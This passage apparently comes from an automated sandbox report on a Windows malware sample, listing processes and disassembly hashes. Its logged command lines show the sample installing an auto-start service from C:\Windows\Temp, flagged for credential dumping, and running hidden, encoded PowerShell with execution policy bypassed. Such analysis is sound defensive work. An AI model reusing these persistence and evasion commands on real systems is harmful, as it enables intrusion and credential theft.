MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	06:30:11
Start date:	11/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /c sc query myRdpService
Imagebase:	0x7ff61f9e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5164, Parent PID: 1672

General

Target ID:	37
Start time:	06:30:11
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62e4d0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	06:30:11
Start date:	11/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc query myRdpService
Imagebase:	0x7ff6c5d50000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	06:30:18
Start date:	11/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
Imagebase:	0x7ff61f9e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	06:30:18
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62e4d0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	06:30:18
Start date:	11/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc delete "myRdpService"
Imagebase:	0x7ff6c5d50000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	06:30:18
Start date:	11/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
Imagebase:	0x7ff6c5d50000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	06:30:18
Start date:	11/12/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net start "myRdpService"
Imagebase:	0x7ff72cff0000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	06:30:18
Start date:	11/12/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\net1 start "myRdpService"
Imagebase:	0x7ff680080000
File size:	183'808 bytes
MD5 hash:	BA0BCCC6029FBBE6D8B41197F252742F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	06:30:18
Start date:	11/12/2024
Path:	C:\Windows\Temp\myRdpService.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Temp\myRdpService.exe cakoi10
Imagebase:	0x7ff727620000
File size:	9'429'504 bytes
MD5 hash:	5641F3A5B9787F23D3D34F0D9F791B7A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: hacktool_windows_moyix_creddump, Description: creddump is a python tool to extract credentials and secrets from Windows registry hives., Source: 0000002D.00000002.4760412983.00007FF727B26000.00000004.00000001.01000000.0000000A.sdmp, Author: @mimeframe
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	06:30:25
Start date:	11/12/2024
Path:	C:\Windows\regedit.exe
Wow64 process (32bit):	false
Commandline:	"regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
Imagebase:	0x7ff7a2560000
File size:	370'176 bytes
MD5 hash:	999A30979F6195BF562068639FFC4426
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	06:30:25
Start date:	11/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell.exe" -Command "systeminfo \| Select-String \"OS Name\",\"OS Version\";"
Imagebase:	0x7ff796130000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	06:30:25
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62e4d0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	06:30:26
Start date:	11/12/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\systeminfo.exe"
Imagebase:	0x7ff6afc30000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	06:30:30
Start date:	11/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Imagebase:	0x7ff61f9e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	06:30:30
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62e4d0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	06:30:30
Start date:	11/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Imagebase:	0x7ff796130000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	06:30:31
Start date:	11/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Imagebase:	0x7ff796130000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	06:30:31
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62e4d0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 00007FFC7BB533B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3492197731.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9325aba83ad582e93bd15eb41f38fb5bc96ce5aa1d65184b22700171699f852
Instruction ID: 4f99702751513a775d66cef837e43488e123b54a73caa5a98ed8b0c64b35d5c9
Opcode Fuzzy Hash: c9325aba83ad582e93bd15eb41f38fb5bc96ce5aa1d65184b22700171699f852
Instruction Fuzzy Hash: 0901447111CB0C4FD744EF0CE451AA9B7E0FB99324F10056EE58AC3665DA26E892CB46

Non-executed Functions

Function 00007FFC7BB50E95 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3492197731.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c057fa62a4c9fa4e0c708bdcbb0f9a60cc3cb3703018f13773e27919ad4c44c
Instruction ID: c3a348482bbb49d7233e1d32aa83b41b41c20831be502a872e8008a30b5422b6
Opcode Fuzzy Hash: 9c057fa62a4c9fa4e0c708bdcbb0f9a60cc3cb3703018f13773e27919ad4c44c
Instruction Fuzzy Hash: F2A1B06791D6E70EE3525A2C5DB60E57F60FF5B26870A01FBC9848F0A7E905280FC762

Analysis Process: powershell.exePID: 1804, Parent PID: 7116COMMON

Executed Functions

Function 00007FFC7BB5F1C6 Relevance: .5, Instructions: 472COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f5705a9be2bebf77695ade20deeadc129afe57ea319214b042c2785a007e1da
Instruction ID: fbe43f0d57c7d658ff96bef58773f61520e8fc27394780985e4aaa8715d98e60
Opcode Fuzzy Hash: 6f5705a9be2bebf77695ade20deeadc129afe57ea319214b042c2785a007e1da
Instruction Fuzzy Hash: B7F1C331918A8D8FEBA8DF28D8557ED77E1FF54300F04426AE84DC72A5CB34A845CB92

Function 00007FFC7BB5FF72 Relevance: .5, Instructions: 458COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f071bc5cb9b6ad7c7f12c273d46e8f96e2ccab2f2737474d0bcd7cea2a0645a
Instruction ID: c692bfc2dfa1cd7ffc3788c00a6044f5a1852f1114e77e2c49423308f1be14cf
Opcode Fuzzy Hash: 8f071bc5cb9b6ad7c7f12c273d46e8f96e2ccab2f2737474d0bcd7cea2a0645a
Instruction Fuzzy Hash: 43E1C231918A4E8FEBA8DF28C8957E977D1FF54310F44426AE84DC72A5CF78A844CB91

Function 00007FFC7C2C0331 Relevance: .4, Instructions: 417COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3776765248.00007FFC7C2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7C2C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7c2c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5856d15b65c82669a525ea2f3719b5daa90e75e10dddd3536cef06b3ef722ee1
Instruction ID: ee12cda3bcef0fdbe4f802dcc91ba8493f5361be83d9dadf60dc882c7347d111
Opcode Fuzzy Hash: 5856d15b65c82669a525ea2f3719b5daa90e75e10dddd3536cef06b3ef722ee1
Instruction Fuzzy Hash: 78C1F56291DBDE4FEBA6D72848651B97FE0EF46210B1800FFD149CB293EA1C6C05C361

Function 00007FFC7BB5B325 Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 585a4f3a408b2b0e00aca6195a0b7c7d1219021cc5b90cd122f7e25fbc67ef07
Instruction ID: dc4a7e7b5d9e25b711836ff0daa51b7051c6c49394f318be9e45c16ac751b50f
Opcode Fuzzy Hash: 585a4f3a408b2b0e00aca6195a0b7c7d1219021cc5b90cd122f7e25fbc67ef07
Instruction Fuzzy Hash: 6631A57290D79C8FDB66DB5898596ED7FB0EF56310F0441AFD089C71A3C7246806CB62

Function 00007FFC7BB5FB86 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b5e826dce5e966cfb872a8cd7209e21a05b77b8160ca344b0d1dd28b0afdf6d
Instruction ID: 3b05b74ca23d04efddc5faf139e302fd767cb3ac3b450effa304dea66256e69e
Opcode Fuzzy Hash: 1b5e826dce5e966cfb872a8cd7209e21a05b77b8160ca344b0d1dd28b0afdf6d
Instruction Fuzzy Hash: E1B1F471518A8D4FEBA8DF28C8557ED7BE1FF55310F00426AE84DC32A6CA34A840CB92

Function 00007FFC7BB62C62 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f954cc7d6046d30c2f10776facbc163f0827985b050cdded29581cb3a087c4e
Instruction ID: 889bbe70b16eb9f4435f9ba01f8e299624c2e9ab7acb4e6879c35b76df59d105
Opcode Fuzzy Hash: 3f954cc7d6046d30c2f10776facbc163f0827985b050cdded29581cb3a087c4e
Instruction Fuzzy Hash: 7841577291CB9A8FEB09DB1C98562A97BE0FF95310F04417FD848C31A2DB64A815C793

Function 00007FFC7BC227E8 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3764063365.00007FFC7BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bc20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 353313978c6ab6fcd6cd86d40b7a2215a99f50fd513c3d7576e12fc6bdecb175
Instruction ID: 26a80068d72d0c3e8a885629f473996db37c8cf5398427a9b0328893cb8696e8
Opcode Fuzzy Hash: 353313978c6ab6fcd6cd86d40b7a2215a99f50fd513c3d7576e12fc6bdecb175
Instruction Fuzzy Hash: D0319033B1CE6E4BFAA9D61C64516F9B2D2DF54220B4881BBC50EC71AADD18E811C2A5

Function 00007FFC7BB5B658 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bdf006640f926d12413dc6bbd40d99cce8caf0ab9ed681bfce2718ad1ef2216
Instruction ID: 31839dda05af769a5ec3d58947ca6a8595204003e40b94c85f98fb12b1d24813
Opcode Fuzzy Hash: 8bdf006640f926d12413dc6bbd40d99cce8caf0ab9ed681bfce2718ad1ef2216
Instruction Fuzzy Hash: 2831E53190CA4C8FEB58DF98D84A6ED7BE0EF56320F04016FD449C7162CB64A816CB51

Function 00007FFC7BB5F684 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2958204c62fd39654f4f9865d22b3c0e290da4483269e8aa32327748579e8dd9
Instruction ID: 5558d4282f9429fb6baa784be9eccb151110d6074fe50508a45e17d0ca14d193
Opcode Fuzzy Hash: 2958204c62fd39654f4f9865d22b3c0e290da4483269e8aa32327748579e8dd9
Instruction Fuzzy Hash: 7731FC3192966E8EFBB8AF18CD0ABF97294FF45315F400139D84DC61A6DA387945CA22

Function 00007FFC7BB63039 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9141d78aa000aa4f79a8e7d65c34737721e8db1e735c3ae3736a867c33c3d564
Instruction ID: f5dd44a0b88785359cd26ce1f5d205a3830461e70b49513d8d6f924a7363d523
Opcode Fuzzy Hash: 9141d78aa000aa4f79a8e7d65c34737721e8db1e735c3ae3736a867c33c3d564
Instruction Fuzzy Hash: 5C219631A1CA5C8FEB58DF9CD8497ED7BE0EBA5321F04822FD409C3155DA709859CB91

Function 00007FFC7C2C0622 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3776765248.00007FFC7C2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7C2C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7c2c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bc30c8c096e5fa27e330fcf905c13f0dd380e98b01d301dc0d6262cc42206be
Instruction ID: 658bf000b91cde02d81e4c6c038342006bb743786481da3c502e49b7bb37e203
Opcode Fuzzy Hash: 6bc30c8c096e5fa27e330fcf905c13f0dd380e98b01d301dc0d6262cc42206be
Instruction Fuzzy Hash: BE21819380EBD74FE7679B7818692A46FE0DF57164B1901EBC184CB2E3E50C1C4AC362

Function 00007FFC7BC22818 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3764063365.00007FFC7BC20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BC20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bc20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b0d288e2a931ecb522b6370e39f50e16d78d8af2b371cd88e7dcdb92956fc7d
Instruction ID: 2fa4ade781d524108d59840344dab5fa6e50d308c9568dd192ebba08fedf076e
Opcode Fuzzy Hash: 5b0d288e2a931ecb522b6370e39f50e16d78d8af2b371cd88e7dcdb92956fc7d
Instruction Fuzzy Hash: 1D018673F2DD2E0BFAA9911C24552FD51C2DF94211B58817BC44EC71BADD4CEC018261

Function 00007FFC7BB537B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7deb8d9253779e66f1504a83c3a7b8467859899de5ce38b81fef9af03bd96ea0
Instruction ID: cf38b30a496acfd85d3726103d8e1f6a917b09d8fd4b60b509b8d948658bdfd7
Opcode Fuzzy Hash: 7deb8d9253779e66f1504a83c3a7b8467859899de5ce38b81fef9af03bd96ea0
Instruction Fuzzy Hash: C101677111CB0D4FD744EF0CE451AAAB7E0FB99324F10056EE58AC3665D736E892CB46

Function 00007FFC7BB62E58 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46e5323bf3c3ecab5bd1755565bebe1ddebe56b0c441f035dbf22be64583a910
Instruction ID: d69ec73a41e1b25dc3c6ca308433471035bd1a58bc7b04e0a78c902d5d3d15b4
Opcode Fuzzy Hash: 46e5323bf3c3ecab5bd1755565bebe1ddebe56b0c441f035dbf22be64583a910
Instruction Fuzzy Hash: 35F02B31C1868E4FEB059F2888155E57FA0FF26310F0542A7D848C71B2DB649858C7D2

Non-executed Functions

Function 00007FFC7BB572DA Relevance: 26.7, Strings: 21, Instructions: 497COMMON

Download Yara Rule

Strings

xD{, xrefs: 00007FFC7BB575E1
xE{, xrefs: 00007FFC7BB57661
8B{, xrefs: 00007FFC7BB574C1
8C{, xrefs: 00007FFC7BB57541
XB{, xrefs: 00007FFC7BB574D1
XC{, xrefs: 00007FFC7BB57551
8F{, xrefs: 00007FFC7BB576C1
xC{, xrefs: 00007FFC7BB57561
89{, xrefs: 00007FFC7BB57759
XD{, xrefs: 00007FFC7BB575D1
XE{, xrefs: 00007FFC7BB57651
XA{, xrefs: 00007FFC7BB57451
x9{, xrefs: 00007FFC7BB57779
8A{, xrefs: 00007FFC7BB57441
8E{, xrefs: 00007FFC7BB57641
xF{, xrefs: 00007FFC7BB576E1
8D{, xrefs: 00007FFC7BB575C1
xB{, xrefs: 00007FFC7BB574E1
xA{, xrefs: 00007FFC7BB57461
X9{, xrefs: 00007FFC7BB57769
XF{, xrefs: 00007FFC7BB576D1

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID: 89{$8A{$8B{$8C{$8D{$8E{$8F{$X9{$XA{$XB{$XC{$XD{$XE{$XF{$x9{$xA{$xB{$xC{$xD{$xE{$xF{
API String ID: 0-4273802936
Opcode ID: 53336ee89b6bd9435c394412f6a858a9a57349f4879d798ea40ec7e416afa739
Instruction ID: 474935b556cec746af1f8e7d24615978d0c986811207c72e7459a3ae7d841ddf
Opcode Fuzzy Hash: 53336ee89b6bd9435c394412f6a858a9a57349f4879d798ea40ec7e416afa739
Instruction Fuzzy Hash: 01E1D7A371F9CA8BFA59821C69164797F61FF46360B1C02FBD444471EF9C2C9A0A835A

Function 00007FFC7BB57836 Relevance: 25.4, Strings: 20, Instructions: 406COMMON

Download Yara Rule

Strings

8?{, xrefs: 00007FFC7BB57A59
x={, xrefs: 00007FFC7BB57979
x@{, xrefs: 00007FFC7BB57AF9
8={, xrefs: 00007FFC7BB57959
X?{, xrefs: 00007FFC7BB57A69
8@{, xrefs: 00007FFC7BB57AD9
8>{, xrefs: 00007FFC7BB579D9
x?{, xrefs: 00007FFC7BB57A79
X>{, xrefs: 00007FFC7BB579E9
X1{, xrefs: 00007FFC7BB57B81
8<{, xrefs: 00007FFC7BB578D9
x<{, xrefs: 00007FFC7BB578F9
x>{, xrefs: 00007FFC7BB579F9
X<{, xrefs: 00007FFC7BB578E9
81{, xrefs: 00007FFC7BB57B71
X@{, xrefs: 00007FFC7BB57AE9
X;{, xrefs: 00007FFC7BB57869
X={, xrefs: 00007FFC7BB57969
8;{, xrefs: 00007FFC7BB57859
x;{, xrefs: 00007FFC7BB57879

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID: 81{$8;{$8<{$8={$8>{$8?{$8@{$X1{$X;{$X<{$X={$X>{$X?{$X@{$x;{$x<{$x={$x>{$x?{$x@{
API String ID: 0-3374621401
Opcode ID: 52eaac4ef33cf90b9e339d6e6f522452aef2ecbe21bd4dbd6d083f24b438c11b
Instruction ID: 9d33539b0cc92167ac26a57204721e3b0bb20074086a2839481c912b7ab0c788
Opcode Fuzzy Hash: 52eaac4ef33cf90b9e339d6e6f522452aef2ecbe21bd4dbd6d083f24b438c11b
Instruction Fuzzy Hash: 18B1FBB3B2E9CA5BF919825D29175396A52FF4265076C03F7C048472EF6C2C9F09C2A6

Function 00007FFC7BB584C4 Relevance: 17.9, Strings: 14, Instructions: 377COMMON

Download Yara Rule

Strings

x%{, xrefs: 00007FFC7BB585C1
8'{, xrefs: 00007FFC7BB586A1
x&{, xrefs: 00007FFC7BB58641
8%{, xrefs: 00007FFC7BB585A1
I, xrefs: 00007FFC7BB5873D
X%{, xrefs: 00007FFC7BB585B1
x'{, xrefs: 00007FFC7BB586C1
X({, xrefs: 00007FFC7BB58731
x({, xrefs: 00007FFC7BB58741
x${, xrefs: 00007FFC7BB58541
8({, xrefs: 00007FFC7BB58721
X'{, xrefs: 00007FFC7BB586B1
8&{, xrefs: 00007FFC7BB58621
X&{, xrefs: 00007FFC7BB58631

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID: 8%{$8&{$8'{$8({$I$X%{$X&{$X'{$X({$x${$x%{$x&{$x'{$x({
API String ID: 0-1945280271
Opcode ID: 8913fa2cecdcf221aa9db8b044929b6acb795ec315f8f53ab60e73710a5f0973
Instruction ID: 2fb4e276d77083a042237b8543fb6346fb9088e992a62c27f7fda18604dc57fd
